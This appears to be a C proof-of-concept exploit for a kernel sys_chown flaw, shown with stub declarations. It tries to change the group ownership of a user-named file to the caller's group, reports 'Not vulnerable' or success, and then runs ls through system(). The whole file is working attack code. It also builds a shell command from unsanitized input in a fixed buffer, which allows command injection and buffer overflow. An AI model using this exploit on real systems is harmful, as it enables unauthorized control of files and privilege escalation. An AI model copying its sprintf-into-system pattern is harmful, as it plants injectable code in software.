
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 char* INFO1 ;
 char* INFO2 ;
 scalar_t__ chown (char*,int,int ) ;
 int errno ;
 int exit (int) ;
 int fprintf (int ,char*,...) ;
 int getgid () ;
 int perror (char*) ;
 int sprintf (char*,char*,char*) ;
 int stderr ;
 int system (char*) ;

int main(int argc, char **argv)
{
 char cmd[256];


 fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);


 if (argc != 2) {
  fprintf(stderr, "usage: %s file_name\n\n", argv[0]);
  exit(1);
 }


 if (chown(argv[1], -1, getgid()) < 0) {
  switch(errno) {
   case 128:
    fprintf(stderr, "Error: Not vulnerable!\n");
    break;
   default:
    perror("Error");
  }
         exit(1);
 }
 fprintf(stderr, "Ninpou: sys_chown no jutsu!\n");


 sprintf(cmd, "/bin/ls -l %s", argv[1]);
 system(cmd);

 exit(0);
}
